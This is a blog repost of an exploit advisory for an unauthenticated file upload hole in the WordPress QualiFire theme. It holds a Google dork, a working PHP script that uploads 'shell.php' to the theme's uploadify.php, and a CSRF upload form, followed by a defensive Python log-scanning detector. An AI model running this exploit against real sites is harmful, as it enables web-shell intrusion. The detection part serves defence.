Friday, January 20, 2017
Wordpress Themes QualiFire File Upload Vulnerability

#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================
-- Proof Of Concept --
Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
When vulnerable : the script responds with a blank page
Remote file :
<?php
// File to send to the theme's upload handler (the PHP script the advisory names above).
$uploadfile = "shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// Uploadify expects the file in the "Filedata" field and the destination in "folder";
// array keys and the folder path must be quoted strings in PHP.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
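The proof of concept above is a single unauthenticated POST to the theme's bundled uploadify.php, followed by a request for the file it dropped. As an added detection example (not code from the advisory author or the theme vendor), the script below scans web-server access logs for that two-step pattern. It assumes Apache/nginx combined log format and runs on constructed sample lines using RFC 5737 documentation addresses. It generalizes beyond this theme by matching any `.../uploadify/uploadify.php` handler path, since the same Uploadify back end shipped with other themes and plugins, and it rates a `.php` file served from an upload directory as high severity when the same client POSTed to that directory's handler first.

```python
import re
from collections import defaultdict

# Combined/common log format: client IP, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Trailing component of the upload handler named in the advisory. Matching only on
# the suffix is deliberate: other themes and plugins bundled the same script.
HANDLER_SUFFIX = "/uploadify/uploadify.php"


def parse_line(line):
    """Split one access-log line into fields; return None for lines that don't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def find_upload_abuse(lines):
    """Flag POSTs to an uploadify.php handler, and any later request for a .php file
    living in an uploadify directory (the advisory's "folder" target)."""
    findings = []
    upload_dirs = defaultdict(set)  # client ip -> handler directories it POSTed to
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, ip = rec["path"], rec["ip"]
        lower = path.lower()
        if rec["method"] == "POST" and lower.endswith(HANDLER_SUFFIX):
            upload_dirs[ip].add(lower[: -len("uploadify.php")])
            findings.append({"type": "upload_post", "ip": ip, "ts": rec["ts"],
                             "path": path, "status": rec["status"]})
        elif (lower.endswith(".php") and "/uploadify/" in lower
              and not lower.endswith(HANDLER_SUFFIX)):
            directory = lower.rsplit("/", 1)[0] + "/"
            # A PHP file served from an upload directory is suspicious on its own;
            # it is near-certain abuse if this client uploaded there first.
            severity = "high" if directory in upload_dirs[ip] else "medium"
            findings.append({"type": "php_in_upload_dir", "ip": ip, "ts": rec["ts"],
                             "path": path, "status": rec["status"],
                             "severity": severity})
    return findings


# Constructed sample log (documentation addresses, not real traffic). Line 2 is the
# upload from the PoC, line 3 the dropped file being fetched by the same client.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Jan/2017:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Jan/2017:10:00:05 +0000] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [20/Jan/2017:10:00:09 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/shell.php?x=1 HTTP/1.1" 200 312',
    '198.51.100.4 - - [20/Jan/2017:10:01:00 +0000] "GET /wp-content/themes/qualifire/style.css HTTP/1.1" 200 4410',
    '198.51.100.4 - - [20/Jan/2017:10:01:02 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 0',
    '198.51.100.4 - - [20/Jan/2017:10:01:30 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/shell.php HTTP/1.1" 200 312',
    'garbage line that should be skipped',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A plain GET of uploadify.php (as the advisory's "blank page" check produces) is not flagged by itself, since scanners and search crawlers hit such paths constantly; the POST, and a PHP file served from the upload folder, are the events worth alerting on. The permanent fix is removing or access-controlling the bundled upload script, since the theme's own code path never verifies a logged-in user.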